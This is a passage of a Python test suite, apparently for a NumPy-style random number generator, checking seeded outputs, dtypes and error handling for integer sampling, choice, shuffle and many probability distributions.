ubnd = ubnd - 1 if endpoint else ubnd
dt = np.bool_ if dt is bool else dt
sample = self.rfunc(lbnd, ubnd, endpoint=endpoint, dtype=dt)
assert_equal(sample.dtype, dt)
for dt in (bool, int):
lbnd = 0 if dt is bool else np.iinfo(dt).min
ubnd = 2 if dt is bool else np.iinfo(dt).max + 1
ubnd = ubnd - 1 if endpoint else ubnd
# gh-7284: Ensure that we get Python data types
sample = self.rfunc(lbnd, ubnd, endpoint=endpoint, dtype=dt)
assert not hasattr(sample, "dtype")
assert_equal(type(sample), dt)
def test_respect_dtype_array(self, endpoint):
# See gh-7203
for dt in self.itype:
lbnd = 0 if dt is bool else np.iinfo(dt).min
ubnd = 2 if dt is bool else np.iinfo(dt).max + 1
ubnd = ubnd - 1 if endpoint else ubnd
dt = np.bool_ if dt is bool else dt
sample = self.rfunc([lbnd], [ubnd], endpoint=endpoint, dtype=dt)
assert_equal(sample.dtype, dt)
sample = self.rfunc([lbnd] * 2, [ubnd] * 2, endpoint=endpoint, dtype=dt)
assert_equal(sample.dtype, dt)
def test_zero_size(self, endpoint):
# See gh-7203
for dt in self.itype:
sample = self.rfunc(0, 0, (3, 0, 4), endpoint=endpoint, dtype=dt)
assert sample.shape == (3, 0, 4)
assert sample.dtype == dt
assert self.rfunc(0, -10, 0, endpoint=endpoint, dtype=dt).shape == (0,)
assert_equal(random.integers(0, 0, size=(3, 0, 4)).shape, (3, 0, 4))
assert_equal(random.integers(0, -10, size=0).shape, (0,))
assert_equal(random.integers(10, 10, size=0).shape, (0,))
def test_warns_byteorder(self):
other_byteord_dt = "<i4" if sys.byteorder == "big" else ">i4"
with pytest.warns(FutureWarning):
random.integers(0, 200, size=10, dtype=other_byteord_dt)
class TestRandomDist(object):
# Make sure the random distribution returns the correct value for a
# given seed
def setup(self):
self.seed = 1234567890
def test_rand(self):
random.bit_generator.seed(self.seed)
with pytest.deprecated_call():
actual = random.rand(3, 2)
desired = np.array(
[
[0.61879477158567997, 0.59162362775974664],
[0.88868358904449662, 0.89165480011560816],
[0.4575674820298663, 0.7781880808593471],
]
)
assert_array_almost_equal(actual, desired, decimal=15)
def test_rand_singleton(self):
random.bit_generator.seed(self.seed)
with pytest.deprecated_call():
actual = random.rand()
desired = 0.61879477158567997
assert_array_almost_equal(actual, desired, decimal=15)
def test_randn(self):
random.bit_generator.seed(self.seed)
with pytest.deprecated_call():
actual = random.randn(3, 2)
desired = np.array(
[
[-3.472754000610961, -0.108938564229143],
[-0.245965753396411, -0.704101550261701],
[0.360102487116356, 0.127832101772367],
]
)
assert_array_almost_equal(actual, desired, decimal=15)
random.bit_generator.seed(self.seed)
with pytest.deprecated_call():
actual = random.randn()
assert_array_almost_equal(actual, desired[0, 0], decimal=15)
def test_integers(self):
random.bit_generator.seed(self.seed)
actual = random.integers(-99, 99, size=(3, 2))
desired = np.array([[31, 3], [-52, 41], [-48, -66]])
assert_array_equal(actual, desired)
def test_integers_masked(self):
# Test masked rejection sampling algorithm to generate array of
# uint32 in an interval.
random.bit_generator.seed(self.seed)
with pytest.deprecated_call():
actual = random.integers(
0, 99, size=(3, 2), dtype=np.uint32, use_masked=True
)
desired = np.array([[2, 47], [12, 51], [33, 43]], dtype=np.uint32)
assert_array_equal(actual, desired)
def test_integers_lemire_32(self):
# Test lemire algorithm to generate array of uint32 in an interval.
random.bit_generator.seed(self.seed)
actual = random.integers(0, 99, size=(3, 2), dtype=np.uint32, use_masked=False)
desired = np.array([[61, 33], [58, 14], [87, 23]], dtype=np.uint32)
assert_array_equal(actual, desired)
def test_integers_lemire_64(self):
# Test lemire algorithm to generate array of uint64 in an interval.
random.bit_generator.seed(self.seed)
actual = random.integers(
0, 99 + 0xFFFFFFFFF, size=(3, 2), dtype=np.uint64, use_masked=False
)
desired = np.array(
[
[42523252834, 40656066204],
[61069871386, 61274051182],
[31443797706, 53476677934],
],
dtype=np.uint64,
)
assert_array_equal(actual, desired)
def test_random_integers(self):
random.bit_generator.seed(self.seed)
with suppress_warnings() as sup:
w = sup.record(DeprecationWarning)
actual = random.random_integers(-99, 99, size=(3, 2))
assert_(len(w) == 1)
desired = np.array([[31, 3], [-52, 41], [-48, -66]])
assert_array_equal(actual, desired)
random.bit_generator.seed(self.seed)
with suppress_warnings() as sup:
w = sup.record(DeprecationWarning)
actual = random.random_integers(198, size=(3, 2))
assert_array_equal(actual, desired + 100)
def test_random_integers_max_int(self):
# Tests whether random_integers can generate the
# maximum allowed Python int that can be converted
# into a C long. Previous implementations of this
# method have thrown an OverflowError when attempting
# to generate this integer.
with suppress_warnings() as sup:
w = sup.record(DeprecationWarning)
actual = random.random_integers(np.iinfo("l").max, np.iinfo("l").max)
assert_(len(w) == 1)
desired = np.iinfo("l").max
assert_equal(actual, desired)
def test_random_integers_deprecated(self):
with warnings.catch_warnings():
warnings.simplefilter("error", DeprecationWarning)
# DeprecationWarning raised with high == None
assert_raises(DeprecationWarning, random.random_integers, np.iinfo("l").max)
# DeprecationWarning raised with high != None
assert_raises(
DeprecationWarning,
random.random_integers,
np.iinfo("l").max,
np.iinfo("l").max,
)
def test_random(self):
random.bit_generator.seed(self.seed)
actual = random.random((3, 2))
desired = np.array(
[
[0.61879477158567997, 0.59162362775974664],
[0.88868358904449662, 0.89165480011560816],
[0.4575674820298663, 0.7781880808593471],
]
)
assert_array_almost_equal(actual, desired, decimal=15)
random.bit_generator.seed(self.seed)
actual = random.random()
assert_array_almost_equal(actual, desired[0, 0], decimal=15)
def test_random_float(self):
random.bit_generator.seed(self.seed)
actual = random.random((3, 2))
desired = np.array(
[[0.6187948, 0.5916236], [0.8886836, 0.8916548], [0.4575675, 0.7781881]]
)
assert_array_almost_equal(actual, desired, decimal=7)
def test_random_float_scalar(self):
random.bit_generator.seed(self.seed)
actual = random.random(dtype=np.float32)
desired = 0.6187948
assert_array_almost_equal(actual, desired, decimal=7)
def test_random_unsupported_type(self):
assert_raises(TypeError, random.random, dtype="int32")
def test_choice_uniform_replace(self):
random.bit_generator.seed(self.seed)
actual = random.choice(4, 4)
desired = np.array([2, 1, 2, 0], dtype=np.int64)
assert_array_equal(actual, desired)
def test_choice_nonuniform_replace(self):
random.bit_generator.seed(self.seed)
actual = random.choice(4, 4, p=[0.4, 0.4, 0.1, 0.1])
desired = np.array([1, 1, 2, 2], dtype=np.int64)
assert_array_equal(actual, desired)
def test_choice_uniform_noreplace(self):
random.bit_generator.seed(self.seed)
actual = random.choice(4, 3, replace=False)
desired = np.array([3, 2, 1], dtype=np.int64)
assert_array_equal(actual, desired)
def test_choice_nonuniform_noreplace(self):
random.bit_generator.seed(self.seed)
actual = random.choice(4, 3, replace=False, p=[0.1, 0.3, 0.5, 0.1])
desired = np.array([2, 3, 1], dtype=np.int64)
assert_array_equal(actual, desired)
def test_choice_noninteger(self):
random.bit_generator.seed(self.seed)
actual = random.choice(["a", "b", "c", "d"], 4)
desired = np.array(["c", "b", "c", "a"])
assert_array_equal(actual, desired)
def test_choice_multidimensional_default_axis(self):
random.bit_generator.seed(self.seed)
actual = random.choice([[0, 1], [2, 3], [4, 5], [6, 7]], 3)
desired = np.array([[4, 5], [2, 3], [4, 5]])
assert_array_equal(actual, desired)
def test_choice_multidimensional_custom_axis(self):
random.bit_generator.seed(self.seed)
actual = random.choice([[0, 1], [2, 3], [4, 5], [6, 7]], 1, axis=1)
desired = np.array([[1], [3], [5], [7]])
assert_array_equal(actual, desired)
def test_choice_exceptions(self):
sample = random.choice
assert_raises(ValueError, sample, -1, 3)
assert_raises(ValueError, sample, 3.0, 3)
assert_raises(ValueError, sample, [], 3)
assert_raises(
ValueError, sample, [1, 2, 3, 4], 3, p=[[0.25, 0.25], [0.25, 0.25]]
)
assert_raises(ValueError, sample, [1, 2], 3, p=[0.4, 0.4, 0.2])
assert_raises(ValueError, sample, [1, 2], 3, p=[1.1, -0.1])
assert_raises(ValueError, sample, [1, 2], 3, p=[0.4, 0.4])
assert_raises(ValueError, sample, [1, 2, 3], 4, replace=False)
# gh-13087
assert_raises(ValueError, sample, [1, 2, 3], -2, replace=False)
assert_raises(ValueError, sample, [1, 2, 3], (-1,), replace=False)
assert_raises(ValueError, sample, [1, 2, 3], (-1, 1), replace=False)
assert_raises(ValueError, sample, [1, 2, 3], 2, replace=False, p=[1, 0, 0])
def test_choice_return_shape(self):
p = [0.1, 0.9]
# Check scalar
assert_(np.isscalar(random.choice(2, replace=True)))
assert_(np.isscalar(random.choice(2, replace=False)))
assert_(np.isscalar(random.choice(2, replace=True, p=p)))
assert_(np.isscalar(random.choice(2, replace=False, p=p)))
assert_(np.isscalar(random.choice([1, 2], replace=True)))
assert_(random.choice([None], replace=True) is None)
a = np.array([1, 2])
arr = np.empty(1, dtype=object)
arr[0] = a
assert_(random.choice(arr, replace=True) is a)
# Check 0-d array
s = tuple()
assert_(not np.isscalar(random.choice(2, s, replace=True)))
assert_(not np.isscalar(random.choice(2, s, replace=False)))
assert_(not np.isscalar(random.choice(2, s, replace=True, p=p)))
assert_(not np.isscalar(random.choice(2, s, replace=False, p=p)))
assert_(not np.isscalar(random.choice([1, 2], s, replace=True)))
assert_(random.choice([None], s, replace=True).ndim == 0)
a = np.array([1, 2])
arr = np.empty(1, dtype=object)
arr[0] = a
assert_(random.choice(arr, s, replace=True).item() is a)
# Check multi dimensional array
s = (2, 3)
p = [0.1, 0.1, 0.1, 0.1, 0.4, 0.2]
assert_equal(random.choice(6, s, replace=True).shape, s)
assert_equal(random.choice(6, s, replace=False).shape, s)
assert_equal(random.choice(6, s, replace=True, p=p).shape, s)
assert_equal(random.choice(6, s, replace=False, p=p).shape, s)
assert_equal(random.choice(np.arange(6), s, replace=True).shape, s)
# Check zero-size
assert_equal(random.integers(0, 0, size=(3, 0, 4)).shape, (3, 0, 4))
assert_equal(random.integers(0, -10, size=0).shape, (0,))
assert_equal(random.integers(10, 10, size=0).shape, (0,))
assert_equal(random.choice(0, size=0).shape, (0,))
assert_equal(random.choice([], size=(0,)).shape, (0,))
assert_equal(random.choice(["a", "b"], size=(3, 0, 4)).shape, (3, 0, 4))
assert_raises(ValueError, random.choice, [], 10)
def test_choice_nan_probabilities(self):
a = np.array([42, 1, 2])
p = [None, None, None]
with np.errstate(invalid="ignore"):
assert_raises(ValueError, random.choice, a, p=p)
    def test_choice_noncontiguous(self):
p = np.ones(10) / 5
p[1::2] = 3.0
random.seed(self.seed)
choice1 = random.choice(5, 3, p=p[::2])
random.seed(self.seed)
choice2 = random.choice(5, 3, p=np.ascontiguousarray(p[::2]))
assert_array_equal(choice1, choice2)
def test_choice_return_type(self):
# gh 9867
p = np.ones(4) / 4.0
actual = random.choice(4, 2)
assert actual.dtype == np.int64
actual = random.choice(4, 2, replace=False)
assert actual.dtype == np.int64
actual = random.choice(4, 2, p=p)
assert actual.dtype == np.int64
actual = random.choice(4, 2, p=p, replace=False)
assert actual.dtype == np.int64
def test_choice_large_sample(self):
import hashlib
choice_hash = "7d65d45dea0cacb950de86582f37ff74"
random.bit_generator.seed(self.seed)
actual = random.choice(10000, 5000, replace=False)
if sys.byteorder != "little":
actual = actual.byteswap()
res = hashlib.md5(actual.view(np.int8)).hexdigest()
assert choice_hash == res
def test_choice_very_large_sample(self):
import hashlib
choice_hash = "c1adc3c51a477b4ca642a5643e3dcad85e10a74c600b5299c64f5257bb060155"
random.bit_generator.seed(self.seed)
actual = random.choice(25000, 12500, replace=False)
assert actual.shape == (12500,)
if sys.byteorder != "little":
actual = actual.byteswap()
res = hashlib.sha256(actual.view(np.int8)).hexdigest()
assert choice_hash == res
def test_bytes(self):
random.bit_generator.seed(self.seed)
actual = random.bytes(10)
desired = b"\x82Ui\x9e\xff\x97+Wf\xa5"
assert_equal(actual, desired)
def test_shuffle(self):
# Test lists, arrays (of various dtypes), and multidimensional versions
# of both, c-contiguous or not:
for conv in [
lambda x: np.array([]),
lambda x: x,
lambda x: np.asarray(x).astype(np.int8),
lambda x: np.asarray(x).astype(np.float32),
lambda x: np.asarray(x).astype(np.complex64),
lambda x: np.asarray(x).astype(object),
lambda x: [(i, i) for i in x],
lambda x: np.asarray([[i, i] for i in x]),
lambda x: np.vstack([x, x]).T,
# gh-11442
lambda x: (
np.asarray([(i, i) for i in x], [("a", int), ("b", int)]).view(
np.recarray
)
),
# gh-4270
lambda x: np.asarray(
[(i, i) for i in x], [("a", (object, (1,))), ("b", (np.int32, (1,)))]
),
]:
random.bit_generator.seed(self.seed)
alist = conv([1, 2, 3, 4, 5, 6, 7, 8, 9, 0])
random.shuffle(alist)
actual = alist
desired = conv([0, 1, 9, 6, 2, 4, 5, 8, 7, 3])
assert_array_equal(actual, desired)
def test_shuffle_masked(self):
# gh-3263
a = np.ma.masked_values(np.reshape(range(20), (5, 4)) % 3 - 1, -1)
b = np.ma.masked_values(np.arange(20) % 3 - 1, -1)
a_orig = a.copy()
b_orig = b.copy()
for _ in range(50):
random.shuffle(a)
assert_equal(sorted(a.data[~a.mask]), sorted(a_orig.data[~a_orig.mask]))
random.shuffle(b)
assert_equal(sorted(b.data[~b.mask]), sorted(b_orig.data[~b_orig.mask]))
def test_permutation(self):
random.bit_generator.seed(self.seed)
alist = [1, 2, 3, 4, 5, 6, 7, 8, 9, 0]
actual = random.permutation(alist)
desired = [0, 1, 9, 6, 2, 4, 5, 8, 7, 3]
assert_array_equal(actual, desired)
random.bit_generator.seed(self.seed)
arr_2d = np.atleast_2d([1, 2, 3, 4, 5, 6, 7, 8, 9, 0]).T
actual = random.permutation(arr_2d)
assert_array_equal(actual, np.atleast_2d(desired).T)
def test_beta(self):
random.bit_generator.seed(self.seed)
actual = random.beta(0.1, 0.9, size=(3, 2))
desired = np.array(
[
[1.45341850513746058e-02, 5.31297615662868145e-04],
[1.85366619058432324e-06, 4.19214516800110563e-03],
[1.58405155108498093e-04, 1.26252891949397652e-04],
]
)
assert_array_almost_equal(actual, desired, decimal=15)
def test_binomial(self):
random.bit_generator.seed(self.seed)
actual = random.binomial(100.123, 0.456, size=(3, 2))
desired = np.array([[37, 43], [42, 48], [46, 45]])
assert_array_equal(actual, desired)
random.bit_generator.seed(self.seed)
actual = random.binomial(100.123, 0.456)
desired = 37
assert_array_equal(actual, desired)
def test_chisquare(self):
random.bit_generator.seed(self.seed)
actual = random.chisquare(50, size=(3, 2))
desired = np.array(
[
[22.2534560369812, 46.9302393710074],
[52.9974164611614, 85.3559029505718],
[46.1580841240719, 36.1933148548090],
]
)
assert_array_almost_equal(actual, desired, decimal=13)
def test_dirichlet(self):
random.bit_generator.seed(self.seed)
alpha = np.array([51.72840233779265162, 39.74494232180943953])
actual = random.dirichlet(alpha, size=(3, 2))
desired = np.array(
[
[
[0.444382290764855, 0.555617709235145],
[0.468440809291970, 0.531559190708030],
],
[
[0.613461427360549, 0.386538572639451],
[0.529103072088183, 0.470896927911817],
],
[
[0.513490650101800, 0.486509349898200],
[0.558550925712797, 0.441449074287203],
],
]
)
assert_array_almost_equal(actual, desired, decimal=15)
bad_alpha = np.array([5.4e-01, -1.0e-16])
assert_raises(ValueError, random.dirichlet, bad_alpha)
random.bit_generator.seed(self.seed)
alpha = np.array([51.72840233779265162, 39.74494232180943953])
actual = random.dirichlet(alpha)
assert_array_almost_equal(actual, desired[0, 0], decimal=15)
def test_dirichlet_size(self):
# gh-3173
p = np.array([51.72840233779265162, 39.74494232180943953])
assert_equal(random.dirichlet(p, np.uint32(1)).shape, (1, 2))
assert_equal(random.dirichlet(p, np.uint32(1)).shape, (1, 2))
assert_equal(random.dirichlet(p, np.uint32(1)).shape, (1, 2))
assert_equal(random.dirichlet(p, [2, 2]).shape, (2, 2, 2))
assert_equal(random.dirichlet(p, (2, 2)).shape, (2, 2, 2))
assert_equal(random.dirichlet(p, np.array((2, 2))).shape, (2, 2, 2))
assert_raises(TypeError, random.dirichlet, p, float(1))
def test_dirichlet_bad_alpha(self):
# gh-2089
alpha = np.array([5.4e-01, -1.0e-16])
assert_raises(ValueError, random.dirichlet, alpha)
assert_raises(ValueError, random.dirichlet, [[5, 1]])
assert_raises(ValueError, random.dirichlet, [[5], [1]])
assert_raises(ValueError, random.dirichlet, [[[5], [1]], [[1], [5]]])
assert_raises(ValueError, random.dirichlet, np.array([[5, 1], [1, 5]]))
def test_dirichlet_non_contiguous_alpha(self):
a = np.array([51.72840233779265162, -1.0, 39.74494232180943953])
alpha = a[::2]
random.bit_generator.seed(self.seed)
non_contig = random.dirichlet(alpha, size=(3, 2))
random.bit_generator.seed(self.seed)
contig = random.dirichlet(np.ascontiguousarray(alpha), size=(3, 2))
assert_array_almost_equal(contig, non_contig)
def test_dirichlet_small_alpha(self):
eps = 1.0e-9 # 1.0e-10 -> runtime x 10; 1e-11 -> runtime x 200, etc.
alpha = eps * np.array([1.0, 1.0e-3])
random = Generator(MT19937(self.seed, mode="sequence"))
actual = random.dirichlet(alpha, size=(3, 2))
expected = np.array(
[
[[1.0, 0.0], [1.0, 0.0]],
[[1.0, 0.0], [1.0, 0.0]],
[[1.0, 0.0], [1.0, 0.0]],
]
)
assert_array_almost_equal(actual, expected, decimal=15)
@pytest.mark.slow
def test_dirichlet_moderately_small_alpha(self):
# Use alpha.max() < 0.1 to trigger stick breaking code path
alpha = np.array([0.02, 0.04, 0.03])
exact_mean = alpha / alpha.sum()
random = Generator(MT19937(self.seed, mode="sequence"))
sample = random.dirichlet(alpha, size=20000000)
sample_mean = sample.mean(axis=0)
assert_allclose(sample_mean, exact_mean, rtol=1e-3)
def test_exponential(self):
random.bit_generator.seed(self.seed)
actual = random.exponential(1.1234, size=(3, 2))
desired = np.array(
[
[5.350682337747634, 1.152307441755771],
[3.867015473358779, 1.538765912839396],
[0.347846818048527, 2.715656549872026],
]
)
assert_array_almost_equal(actual, desired, decimal=15)
def test_exponential_0(self):
assert_equal(random.exponential(scale=0), 0)
assert_raises(ValueError, random.exponential, scale=-0.0)
def test_f(self):
random.bit_generator.seed(self.seed)
actual = random.f(12, 77, size=(3, 2))
desired = np.array(
[
[0.809498839488467, 2.867222762455471],
[0.588036831639353, 1.012185639664636],
[1.147554281917365, 1.150886518432105],
]
)
assert_array_almost_equal(actual, desired, decimal=15)
def test_gamma(self):
random.bit_generator.seed(self.seed)
actual = random.gamma(5, 3, size=(3, 2))
desired = np.array(
[
[12.46569350177219, 16.46580642087044],
[43.65744473309084, 11.98722785682592],
[6.50371499559955, 7.48465689751638],
]
)
assert_array_almost_equal(actual, desired, decimal=14)
def test_gamma_0(self):
assert_equal(random.gamma(shape=0, scale=0), 0)
assert_raises(ValueError, random.gamma, shape=-0.0, scale=-0.0)
def test_geometric(self):
random.bit_generator.seed(self.seed)
actual = random.geometric(0.123456789, size=(3, 2))
desired = np.array([[8, 7], [17, 17], [5, 12]])
assert_array_equal(actual, desired)
def test_geometric_exceptions(self):
assert_raises(ValueError, random.geometric, 1.1)
assert_raises(ValueError, random.geometric, [1.1] * 10)
assert_raises(ValueError, random.geometric, -0.1)
assert_raises(ValueError, random.geometric, [-0.1] * 10)
with np.errstate(invalid="ignore"):
assert_raises(ValueError, random.geometric, np.nan)
assert_raises(ValueError, random.geometric, [np.nan] * 10)
def test_gumbel(self):
random.bit_generator.seed(self.seed)
actual = random.gumbel(loc=0.123456789, scale=2.0, size=(3, 2))
desired = np.array(
[
[0.19591898743416816, 0.34405539668096674],
[-1.4492522252274278, -1.47374816298446865],
[1.10651090478803416, -0.69535848626236174],
]
)
assert_array_almost_equal(actual, desired, decimal=15)
def test_gumbel_0(self):
assert_equal(random.gumbel(scale=0), 0)
assert_raises(ValueError, random.gumbel, scale=-0.0)
def test_hypergeometric(self):
random.bit_generator.seed(self.seed)
actual = random.hypergeometric(10.1, 5.5, 14, size=(3, 2))
desired = np.array([[9, 9], [10, 9], [9, 10]])
assert_array_equal(actual, desired)
# Test nbad = 0
actual = random.hypergeometric(5, 0, 3, size=4)
desired = np.array([3, 3, 3, 3])
assert_array_equal(actual, desired)
actual = random.hypergeometric(15, 0, 12, size=4)
desired = np.array([12, 12, 12, 12])
assert_array_equal(actual, desired)
# Test ngood = 0
actual = random.hypergeometric(0, 5, 3, size=4)
desired = np.array([0, 0, 0, 0])
assert_array_equal(actual, desired)
actual = random.hypergeometric(0, 15, 12, size=4)
desired = np.array([0, 0, 0, 0])
assert_array_equal(actual, desired)
def test_laplace(self):
random.bit_generator.seed(self.seed)
actual = random.laplace(loc=0.123456789, scale=2.0, size=(3, 2))
desired = np.array(
[
[0.66599721112760157, 0.52829452552221945],
[3.12791959514407125, 3.18202813572992005],
[-0.05391065675859356, 1.74901336242837324],
]
)
assert_array_almost_equal(actual, desired, decimal=15)
def test_laplace_0(self):
assert_equal(random.laplace(scale=0), 0)
assert_raises(ValueError, random.laplace, scale=-0.0)
def test_logistic(self):
random.bit_generator.seed(self.seed)
actual = random.logistic(loc=0.123456789, scale=2.0, size=(3, 2))
desired = np.array(
[
[1.09232835305011444, 0.8648196662399954],
[4.27818590694950185, 4.33897006346929714],
[-0.21682183359214885, 2.63373365386060332],
]
)
assert_array_almost_equal(actual, desired, decimal=15)
def test_lognormal(self):
random.bit_generator.seed(self.seed)
actual = random.lognormal(mean=0.123456789, sigma=2.0, size=(3, 2))
desired = np.array(
[
[1.0894838661036e-03, 9.0990021488311e-01],
[6.9178869932225e-01, 2.7672077560016e-01],
[2.3248645126975e00, 1.4609997951330e00],
]
)
assert_array_almost_equal(actual, desired, decimal=13)
def test_lognormal_0(self):
assert_equal(random.lognormal(sigma=0), 1)
assert_raises(ValueError, random.lognormal, sigma=-0.0)
def test_logseries(self):
random.bit_generator.seed(self.seed)
actual = random.logseries(p=0.923456789, size=(3, 2))
desired = np.array([[2, 2], [6, 17], [3, 6]])
assert_array_equal(actual, desired)
def test_logseries_exceptions(self):
with np.errstate(invalid="ignore"):
assert_raises(ValueError, random.logseries, np.nan)
assert_raises(ValueError, random.logseries, [np.nan] * 10)
def test_multinomial(self):
random = Generator(MT19937(self.seed, mode="sequence"))
actual = random.multinomial(20, [1 / 6.0] * 6, size=(3, 2))
desired = np.array(
[
[[4, 4, 3, 2, 5, 2], [2, 8, 4, 0, 2, 4]],
[[4, 4, 5, 1, 3, 3], [2, 4, 1, 5, 2, 6]],
[[1, 2, 7, 5, 2, 3], [5, 4, 4, 2, 3, 2]],
]
)
assert_array_equal(actual, desired)
random = Generator(MT19937(self.seed, mode="sequence"))
actual = random.multinomial([5, 20], [1 / 6.0] * 6)
desired = np.array([[1, 1, 1, 0, 2, 0], [2, 8, 4, 0, 2, 4]], dtype=np.int64)
assert_array_equal(actual, desired)
random = Generator(MT19937(self.seed, mode="sequence"))
actual = random.multinomial([5, 20], [[1 / 6.0] * 6] * 2)
desired = np.array([[1, 1, 1, 0, 2, 0], [2, 8, 4, 0, 2, 4]], dtype=np.int64)
assert_array_equal(actual, desired)
random = Generator(MT19937(self.seed, mode="sequence"))
actual = random.multinomial([[5], [20]], [[1 / 6.0] * 6] * 2)
desired = np.array(
[
[[1, 1, 1, 0, 2, 0], [0, 4, 1, 0, 0, 0]],
[[1, 2, 5, 5, 5, 2], [2, 3, 3, 4, 2, 6]],
],
dtype=np.int64,
)
assert_array_equal(actual, desired)
@pytest.mark.parametrize("n", [10, np.array([10, 10]), np.array([[[10]], [[10]]])])
def test_multinomial_pval_broadcast(self, n):
random = Generator(MT19937(self.seed, mode="sequence"))
pvals = np.array([1 / 4] * 4)
actual = random.multinomial(n, pvals)
assert actual.shape == np.broadcast(n, 1).shape + (4,)
pvals = np.vstack([pvals, pvals])
actual = random.multinomial(n, pvals)
assert actual.shape == np.broadcast(n, np.ones(2)).shape + (4,)
pvals = np.vstack([[pvals], [pvals]])
actual = random.multinomial(n, pvals)
expected_shape = np.broadcast(n, np.ones((2, 2))).shape
assert actual.shape == expected_shape + (4,)
actual = random.multinomial(n, pvals, size=(3, 2) + expected_shape)
assert actual.shape == (3, 2) + expected_shape + (4,)
with pytest.raises(ValueError):
# Ensure that size is not broadcast
actual = random.multinomial(n, pvals, size=(1,) * 6)
def test_invalid_pvals_broadcast(self):
random = Generator(MT19937(self.seed, mode="sequence"))
pvals = [[1 / 6] * 6, [1 / 4] * 6]
assert_raises(ValueError, random.multinomial, 1, pvals)
assert_raises(ValueError, random.multinomial, 6, 0.5)
def test_empty_outputs(self):
random = Generator(MT19937(self.seed, mode="sequence"))
actual = random.multinomial(np.empty((10, 0, 6), "i8"), [1 / 6] * 6)
assert actual.shape == (10, 0, 6, 6)
actual = random.multinomial(12, np.empty((10, 0, 10)))
assert actual.shape == (10, 0, 10)
actual = random.multinomial(np.empty((3, 0, 7), "i8"), np.empty((3, 0, 7, 4)))
assert actual.shape == (3, 0, 7, 4)
@pytest.mark.skipif(NP_LT_118, reason="Can only test with NumPy >= 1.18")
@pytest.mark.parametrize("method", ["svd", "eigh", "cholesky"])
def test_multivariate_normal_method(self, method):
from numpy.random import MT19937 as NPMT19937
random = Generator(NPMT19937(self.seed))
mean = (0.123456789, 10)
cov = [[1, 0], [0, 1]]
size = (3, 2)
actual = random.multivariate_normal(mean, cov, size, method=method)
desired = np.array(
[
[
[-1.747478062846581, 11.25613495182354],
[-0.9967333370066214, 10.342002097029821],
],
[
[0.7850019631242964, 11.181113712443013],
[0.8901349653255224, 8.873825399642492],
],
[
[0.7130260107430003, 9.551628690083056],
[0.7127098726541128, 11.991709234143173],
],
]
)
assert_array_almost_equal(actual, desired, decimal=15)
# Check for default size, was raising deprecation warning
actual = random.multivariate_normal(mean, cov, method=method)
desired = np.array([0.233278563284287, 9.424140804347195])
assert_array_almost_equal(actual, desired, decimal=15)
# Check path with scalar size works correctly
scalar = random.multivariate_normal(mean, cov, 3, method=method)
tuple1d = random.multivariate_normal(mean, cov, (3,), method=method)
assert scalar.shape == tuple1d.shape == (3, 2)
# Check that non symmetric covariance input raises exception when
# check_valid='raises' if using default svd method.
mean = [0, 0]
cov = [[1, 2], [1, 2]]
assert_raises(
ValueError, random.multivariate_normal, mean, cov, check_valid="raise"
)
# Check that non positive-semidefinite covariance warns with
# RuntimeWarning
cov = [[1, 2], [2, 1]]
assert_warns(RuntimeWarning, random.multivariate_normal, mean, cov)
assert_warns(
RuntimeWarning, random.multivariate_normal, mean, cov, method="eigh"
)
assert_raises(
LinAlgError, random.multivariate_normal, mean, cov, method="cholesky"
)
# and that it doesn't warn with RuntimeWarning check_valid='ignore'
assert_no_warnings(random.multivariate_normal, mean, cov, check_valid="ignore")
# and that it raises with RuntimeWarning check_valid='raises'
assert_raises(
ValueError, random.multivariate_normal, mean, cov, check_valid="raise"
)
assert_raises(
ValueError,
random.multivariate_normal,
mean,
cov,
check_valid="raise",
method="eigh",
)
# check degenerate samples from singular covariance matrix
cov = [[1, 1], [1, 1]]
if method in ("svd", "eigh"):
samples = random.multivariate_normal(mean, cov, size=(3, 2), method=method)
assert_array_almost_equal(samples[..., 0], samples[..., 1], decimal=6)
else:
assert_raises(
LinAlgError, random.multivariate_normal, mean, cov, method="cholesky"
)
cov = np.array([[1, 0.1], [0.1, 1]], dtype=np.float32)
with suppress_warnings() as sup:
random.multivariate_normal(mean, cov, method=method)
w = sup.record(RuntimeWarning)
assert len(w) == 0
mu = np.zeros(2)
cov = np.eye(2)
assert_raises(
ValueError, random.multivariate_normal, mean, cov, check_valid="other"
)
assert_raises(ValueError, random.multivariate_normal, np.zeros((2, 1, 1)), cov)
assert_raises(ValueError, random.multivariate_normal, mu, np.empty((3, 2)))
assert_raises(ValueError, random.multivariate_normal, mu, np.eye(3))
@pytest.mark.parametrize("method", ["svd", "eigh", "cholesky"])
def test_multivariate_normal_basic_stats(self, method):
random = Generator(MT19937(self.seed, mode="sequence"))
n_s = 1000
mean = np.array([1, 2])
cov = np.array([[2, 1], [1, 2]])
s = random.multivariate_normal(mean, cov, size=(n_s,), method=method)
s_center = s - mean
cov_emp = (s_center.T @ s_center) / (n_s - 1)
# these are pretty loose and are only designed to detect major errors
assert np.all(np.abs(s_center.mean(-2)) < 0.1)
assert np.all(np.abs(cov_emp - cov) < 0.2)
@pytest.mark.parametrize("size", [(4, 3, 2), (5, 4, 3, 2)])
@pytest.mark.parametrize("mean", [np.zeros(2), np.zeros((3, 3))])
def test_multivariate_normal_bad_size(self, mean, size):
cov = np.eye(4)
with pytest.raises(ValueError):
random.multivariate_normal(mean, cov)
mean = np.zeros((2, 3, 4))
with pytest.raises(ValueError):
random.multivariate_normal(mean, cov, size=size)
with pytest.raises(ValueError):
random.multivariate_normal(0, [[1]], size=size)
with pytest.raises(ValueError):
random.multivariate_normal([0], [1], size=size)
def test_multivariate_normal(self):
random.bit_generator.seed(self.seed)
mean = (0.123456789, 10)
cov = [[1, 0], [0, 1]]
size = (3, 2)
actual = random.multivariate_normal(mean, cov, size)
desired = np.array(
[
[
[-3.34929721161096100, 9.891061435770858],
[-0.12250896439641100, 9.295898449738300],
],
[
[0.48355927611635563, 10.127832101772366],
[3.11093021424924300, 10.283109168794352],
],
[
[-0.20332082341774727, 9.868532121697195],
[-1.33806889550667330, 9.813657233804179],
],
]
)
assert_array_almost_equal(actual, desired, decimal=15)
# Check for default size, was raising deprecation warning
actual = random.multivariate_normal(mean, cov)
desired = np.array([-1.097443117192574, 10.535787051184261])
assert_array_almost_equal(actual, desired, decimal=15)
# Check that non positive-semidefinite covariance warns with
# RuntimeWarning
mean = [0, 0]
cov = [[1, 2], [2, 1]]
assert_warns(RuntimeWarning, random.multivariate_normal, mean, cov)
        # and that it doesn't warn with RuntimeWarning check_valid="ignore"
assert_no_warnings(random.multivariate_normal, mean, cov, check_valid="ignore")
# and that it raises with RuntimeWarning check_valid="raises"
assert_raises(
ValueError, random.multivariate_normal, mean, cov, check_valid="raise"
)
